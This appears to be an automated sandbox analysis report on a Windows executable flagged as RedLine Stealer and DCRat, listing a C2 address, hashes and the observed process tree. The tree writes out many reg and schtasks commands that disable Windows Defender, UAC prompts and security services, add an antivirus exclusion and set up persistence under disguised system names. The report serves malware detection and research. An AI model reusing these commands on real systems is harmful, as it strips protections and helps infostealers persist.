Analysis
-
max time kernel
287s -
max time network
303s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
-
submitted
25-11-2022 22:17
General
-
Target
853860d63c8fe8ed293fc5e3ee087046ec9ae01f0cdc9279422fbaefa82455bb.exe
-
Size
4.2MB
-
MD5
80bee79571b9d0d023f231814814ed5c
-
SHA1
74f91dfcde28ede04a31ac7387119d6d1ae72dcc
-
SHA256
853860d63c8fe8ed293fc5e3ee087046ec9ae01f0cdc9279422fbaefa82455bb
-
SHA512
8f66f5fc26a07e93b48324b93df73d35fcedd685ccbb2409a5cb1136eb555afc448aa922be18472ff952443d0b0a095d315ac1d4f2ae2c526154bb2698716ec0
-
SSDEEP
98304:pHX0g2E6BJH8lFEP6H7bvLupQsbJc+BNrTD5E7vqsD:pHEg2E6fH88MSpQsNc+TrxYvqs
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
@rigafox
C2
193.56.146.20:15490
Attributes
-
auth_value
26aae7097c398fbc9b5d4a08a99ab985
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 11 IoCs
-
Modifies security service 2 TTPs 1 IoCs
-
Process spawned unexpected child process 21 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 2 IoCs
-
UAC bypass 3 TTPs 1 IoCs
-
DCRat payload 3 IoCs
Detects payload of DCRat, commonly dropped by NSIS installers.
-
Downloads MZ/PE file
-
Executes dropped EXE 6 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Program Files directory 7 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 21 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
-
Modifies registry class 4 IoCs
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\853860d63c8fe8ed293fc5e3ee087046ec9ae01f0cdc9279422fbaefa82455bb.exe"C:\Users\Admin\AppData\Local\Temp\853860d63c8fe8ed293fc5e3ee087046ec9ae01f0cdc9279422fbaefa82455bb.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DRIVER~1.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DRIVER~1.EXE2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\meme.exeC:\Users\Admin\AppData\Local\Temp\meme.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Google.exe"C:\Users\Admin\AppData\Local\Temp\Google.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Uvanbyzkrfrqlyclqqnvwd.bat" "6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f7⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t "REG_DWORD" /d 0 /f7⤵
- UAC bypass
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f7⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f7⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f7⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f7⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f7⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f7⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f7⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f7⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f7⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f7⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f7⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f7⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f7⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f7⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable7⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f7⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f7⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f7⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f7⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f7⤵
- Modifies registry class
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f7⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f7⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f7⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f7⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f7⤵
- Modifies security service
-
C:\Users\Admin\AppData\Local\Temp\Google.exeC:\Users\Admin\AppData\Local\Temp\Google.exe powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""6⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\AIoLeH13L6.bat"7⤵
-
C:\Windows\SysWOW64\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵
-
C:\Windows\System32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:29⤵
-
C:\Users\Public\taskhostw.exe"C:\Users\Public\taskhostw.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\taskhostw.exeC:\Users\Public\taskhostw.exe powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""9⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "regr" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Defender\en-US\reg.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "reg" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\en-US\reg.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "regr" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Defender\en-US\reg.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\odt\winlogon.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\odt\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\odt\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 11 /tr "'C:\Users\Public\taskhostw.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 11 /tr "'C:\Users\Public\taskhostw.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 5 /tr "'C:\odt\sihost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\odt\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\odt\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\smss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Program Files\7-Zip\Lang\WmiPrvSE.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Program Files\7-Zip\Lang\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Google.exe.logFilesize
1KB
MD59988ec4e75bff9dc242bc8f7dabd2180
SHA13f2d6e9b6e7c06912e6338c523ee5079d921e1b6
SHA256963aa9ecd8590e44e9a0c949b9a6ae80b13bba08455f23dbd34c16248ab0ef39
SHA512b6dca833af0f1e2ec8a2a4308930f0e7d3afcca504c67d86b28ffa8ee4a9b27956559d71f7d3acef2a8c62e946ad847e9d9661e567aab3dd20119b6304673e61
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\taskhostw.exe.logFilesize
1KB
MD59988ec4e75bff9dc242bc8f7dabd2180
SHA13f2d6e9b6e7c06912e6338c523ee5079d921e1b6
SHA256963aa9ecd8590e44e9a0c949b9a6ae80b13bba08455f23dbd34c16248ab0ef39
SHA512b6dca833af0f1e2ec8a2a4308930f0e7d3afcca504c67d86b28ffa8ee4a9b27956559d71f7d3acef2a8c62e946ad847e9d9661e567aab3dd20119b6304673e61
-
C:\Users\Admin\AppData\Local\Temp\AIoLeH13L6.batFilesize
194B
MD54fdbe9c0d3362a85921c1b4a085682cb
SHA1480afacffc6827c34fad95f4f83b8b029fe194a0
SHA256464043e206209ef5e59c91b84229ea310ba3a92fe3d326a92ea326f0bd8da846
SHA512181baf4e9f5201326efa833554ffa63c5405c813f7dd52a92f117f8cd5505175318c663ce090b9dd67c842a35de687c770fa163ec0a51949649dec44d66f8199
-
C:\Users\Admin\AppData\Local\Temp\Google.exeFilesize
6KB
MD585cdcc9411301b100bef819197124f97
SHA13bb6a403e1ca7217d423f45db24412c87d74a9bf
SHA256fe3592daf199ad2b458ecd1493e597cd5602f34b4cdd54c32aa942bf3cce07f9
SHA512ca2120be782da087976c19857495e13cbdc9fc78bcdc28efa422ae87c85c7c89ea6b1c3878527a66970a47e08595ead61f3cd95deb62e1c1fda9a78c6a4ae432
-
C:\Users\Admin\AppData\Local\Temp\Google.exeFilesize
6KB
MD585cdcc9411301b100bef819197124f97
SHA13bb6a403e1ca7217d423f45db24412c87d74a9bf
SHA256fe3592daf199ad2b458ecd1493e597cd5602f34b4cdd54c32aa942bf3cce07f9
SHA512ca2120be782da087976c19857495e13cbdc9fc78bcdc28efa422ae87c85c7c89ea6b1c3878527a66970a47e08595ead61f3cd95deb62e1c1fda9a78c6a4ae432
-
C:\Users\Admin\AppData\Local\Temp\Google.exeFilesize
6KB
MD585cdcc9411301b100bef819197124f97
SHA13bb6a403e1ca7217d423f45db24412c87d74a9bf
SHA256fe3592daf199ad2b458ecd1493e597cd5602f34b4cdd54c32aa942bf3cce07f9
SHA512ca2120be782da087976c19857495e13cbdc9fc78bcdc28efa422ae87c85c7c89ea6b1c3878527a66970a47e08595ead61f3cd95deb62e1c1fda9a78c6a4ae432
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DRIVER~1.EXEFilesize
555.0MB
MD502100eef889156331406136e33e6eadb
SHA101c6a7d2297125fa6f29fbfd664ced52066285af
SHA2568c1a9759c7485875c7de40c39aa1ab55a10861f840d1c203f628c804105c81d0
SHA51268a44d31cec5d48adb4c5901ad0f4ce19b67483dac785a81a231b20372c96522fbee4b0b7496d5c6e7885f1fada77fb2f42e62fb5be1fd5eaef5df7ccfa60717
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DRIVER~1.EXEFilesize
555.0MB
MD502100eef889156331406136e33e6eadb
SHA101c6a7d2297125fa6f29fbfd664ced52066285af
SHA2568c1a9759c7485875c7de40c39aa1ab55a10861f840d1c203f628c804105c81d0
SHA51268a44d31cec5d48adb4c5901ad0f4ce19b67483dac785a81a231b20372c96522fbee4b0b7496d5c6e7885f1fada77fb2f42e62fb5be1fd5eaef5df7ccfa60717
-
C:\Users\Admin\AppData\Local\Temp\Uvanbyzkrfrqlyclqqnvwd.batFilesize
3KB
MD5b28f892a01566653f623b7558679e817
SHA133a78ff78e2578fc4871a6ceec8577cdc6a74059
SHA2569f2e17eb905b3175b3fc498c168e670fb0a9c9d40def78b4569bc22114887434
SHA51285eae954fff0ce8a2f9f71a41aa37fd0304b4700144e301b31b10d3300f8e63ca0e5759c58367b4b09569f0760d1dd034ad239529e9c882399fa44f98e58913e
-
C:\Users\Admin\AppData\Local\Temp\meme.exeFilesize
217KB
MD53a81ce93efc5337676301df4e026964d
SHA1119723ff25927ce695c1d72d2726afe238573131
SHA2563bfdbfde4632bcea57f4993724737f08d96a199bf96496828a8657f51371aab0
SHA512659de5c6e8362b1d0a52f8237ac1ca5b35404b4423b84ca90a8bbac9b9c59d75f1d4f5c245ec1c351595792edb233f91009c0666322d12d0fac331a7cbad3662
-
C:\Users\Admin\AppData\Local\Temp\meme.exeFilesize
217KB
MD53a81ce93efc5337676301df4e026964d
SHA1119723ff25927ce695c1d72d2726afe238573131
SHA2563bfdbfde4632bcea57f4993724737f08d96a199bf96496828a8657f51371aab0
SHA512659de5c6e8362b1d0a52f8237ac1ca5b35404b4423b84ca90a8bbac9b9c59d75f1d4f5c245ec1c351595792edb233f91009c0666322d12d0fac331a7cbad3662
-
C:\Users\Public\taskhostw.exeFilesize
6KB
MD585cdcc9411301b100bef819197124f97
SHA13bb6a403e1ca7217d423f45db24412c87d74a9bf
SHA256fe3592daf199ad2b458ecd1493e597cd5602f34b4cdd54c32aa942bf3cce07f9
SHA512ca2120be782da087976c19857495e13cbdc9fc78bcdc28efa422ae87c85c7c89ea6b1c3878527a66970a47e08595ead61f3cd95deb62e1c1fda9a78c6a4ae432
-
C:\Users\Public\taskhostw.exeFilesize
6KB
MD585cdcc9411301b100bef819197124f97
SHA13bb6a403e1ca7217d423f45db24412c87d74a9bf
SHA256fe3592daf199ad2b458ecd1493e597cd5602f34b4cdd54c32aa942bf3cce07f9
SHA512ca2120be782da087976c19857495e13cbdc9fc78bcdc28efa422ae87c85c7c89ea6b1c3878527a66970a47e08595ead61f3cd95deb62e1c1fda9a78c6a4ae432
-
C:\Users\Public\taskhostw.exeFilesize
6KB
MD585cdcc9411301b100bef819197124f97
SHA13bb6a403e1ca7217d423f45db24412c87d74a9bf
SHA256fe3592daf199ad2b458ecd1493e597cd5602f34b4cdd54c32aa942bf3cce07f9
SHA512ca2120be782da087976c19857495e13cbdc9fc78bcdc28efa422ae87c85c7c89ea6b1c3878527a66970a47e08595ead61f3cd95deb62e1c1fda9a78c6a4ae432
-
memory/192-1128-0x0000000000000000-mapping.dmp
-
memory/356-846-0x0000000000000000-mapping.dmp
-
memory/428-1090-0x0000000000000000-mapping.dmp
-
memory/644-891-0x0000000000000000-mapping.dmp
-
memory/812-820-0x0000000000000000-mapping.dmp
-
memory/996-1127-0x0000000000000000-mapping.dmp
-
memory/1276-1107-0x0000000000000000-mapping.dmp
-
memory/1684-1265-0x0000000000000000-mapping.dmp
-
memory/1836-1146-0x0000000000000000-mapping.dmp
-
memory/2040-1226-0x0000000000000000-mapping.dmp
-
memory/2196-658-0x0000000000000000-mapping.dmp
-
memory/2196-698-0x0000000000010000-0x0000000000018000-memory.dmpFilesize
32KB
-
memory/2196-737-0x0000000006290000-0x00000000064C4000-memory.dmpFilesize
2.2MB
-
memory/2196-738-0x0000000006600000-0x0000000006622000-memory.dmpFilesize
136KB
-
memory/2196-740-0x0000000006740000-0x0000000006A90000-memory.dmpFilesize
3.3MB
-
memory/2200-1182-0x0000000000000000-mapping.dmp
-
memory/2204-878-0x0000000000000000-mapping.dmp
-
memory/2372-917-0x0000000000000000-mapping.dmp
-
memory/2492-1164-0x0000000000000000-mapping.dmp
-
memory/2712-1317-0x0000000000000000-mapping.dmp
-
memory/2796-904-0x0000000000000000-mapping.dmp
-
memory/2980-1016-0x0000000000000000-mapping.dmp
-
memory/3164-1409-0x0000000000461CEE-mapping.dmp
-
memory/3316-865-0x0000000000000000-mapping.dmp
-
memory/3476-1252-0x0000000000000000-mapping.dmp
-
memory/3508-977-0x0000000000000000-mapping.dmp
-
memory/3592-990-0x0000000000000000-mapping.dmp
-
memory/3792-1200-0x0000000000000000-mapping.dmp
-
memory/4000-1055-0x0000000000000000-mapping.dmp
-
memory/4032-814-0x0000000000400000-0x0000000000466000-memory.dmpFilesize
408KB
-
memory/4032-859-0x00000000027B0000-0x00000000027BE000-memory.dmpFilesize
56KB
-
memory/4032-758-0x0000000000461CEE-mapping.dmp
-
memory/4072-930-0x0000000000000000-mapping.dmp
-
memory/4104-202-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4104-234-0x0000000009280000-0x000000000938A000-memory.dmpFilesize
1.0MB
-
memory/4104-1291-0x0000000000000000-mapping.dmp
-
memory/4104-177-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4104-181-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4104-175-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4104-179-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4104-169-0x0000000000400000-0x0000000000428000-memory.dmpFilesize
160KB
-
memory/4104-176-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4104-184-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4104-185-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4104-187-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4104-188-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4104-189-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4104-191-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4104-192-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4104-193-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4104-190-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4104-194-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4104-195-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4104-196-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4104-197-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4104-198-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4104-200-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4104-201-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4104-174-0x000000000042219E-mapping.dmp
-
memory/4104-199-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4104-203-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4104-233-0x00000000096F0000-0x0000000009CF6000-memory.dmpFilesize
6.0MB
-
memory/4104-622-0x000000000ACA0000-0x000000000ACF0000-memory.dmpFilesize
320KB
-
memory/4104-236-0x00000000091D0000-0x00000000091E2000-memory.dmpFilesize
72KB
-
memory/4104-238-0x0000000009230000-0x000000000926E000-memory.dmpFilesize
248KB
-
memory/4104-240-0x0000000009390000-0x00000000093DB000-memory.dmpFilesize
300KB
-
memory/4104-248-0x0000000009560000-0x00000000095F2000-memory.dmpFilesize
584KB
-
memory/4104-249-0x000000000A200000-0x000000000A6FE000-memory.dmpFilesize
5.0MB
-
memory/4104-252-0x0000000009600000-0x0000000009666000-memory.dmpFilesize
408KB
-
memory/4104-512-0x000000000A9D0000-0x000000000AB92000-memory.dmpFilesize
1.8MB
-
memory/4104-513-0x000000000B0D0000-0x000000000B5FC000-memory.dmpFilesize
5.2MB
-
memory/4104-621-0x000000000AC20000-0x000000000AC96000-memory.dmpFilesize
472KB
-
memory/4248-1029-0x0000000000000000-mapping.dmp
-
memory/4336-1331-0x0000000000000000-mapping.dmp
-
memory/4336-1405-0x0000000005BB0000-0x0000000005F00000-memory.dmpFilesize
3.3MB
-
memory/4356-752-0x0000000000000000-mapping.dmp
-
memory/4444-964-0x0000000000000000-mapping.dmp
-
memory/4448-1213-0x0000000000000000-mapping.dmp
-
memory/4464-951-0x0000000000000000-mapping.dmp
-
memory/4532-795-0x0000000000000000-mapping.dmp
-
memory/4708-130-0x0000000000C30000-0x0000000001769000-memory.dmpFilesize
11.2MB
-
memory/4708-131-0x000001834AB70000-0x000001834ABC9000-memory.dmpFilesize
356KB
-
memory/4708-180-0x000001834AB70000-0x000001834ABC9000-memory.dmpFilesize
356KB
-
memory/4708-128-0x0000000000C30000-0x0000000001769000-memory.dmpFilesize
11.2MB
-
memory/4708-122-0x000001834AB70000-0x000001834ABC9000-memory.dmpFilesize
356KB
-
memory/4708-129-0x00007FF8B1AC0000-0x00007FF8B1B6E000-memory.dmpFilesize
696KB
-
memory/4708-178-0x0000000000C30000-0x0000000001769000-memory.dmpFilesize
11.2MB
-
memory/4708-132-0x00007FF8B0C40000-0x00007FF8B0CDD000-memory.dmpFilesize
628KB
-
memory/4708-121-0x0000000000C30000-0x0000000001769000-memory.dmpFilesize
11.2MB
-
memory/4708-183-0x0000000000C30000-0x0000000001769000-memory.dmpFilesize
11.2MB
-
memory/4708-117-0x0000000000000000-mapping.dmp
-
memory/4756-165-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-139-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-152-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-151-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
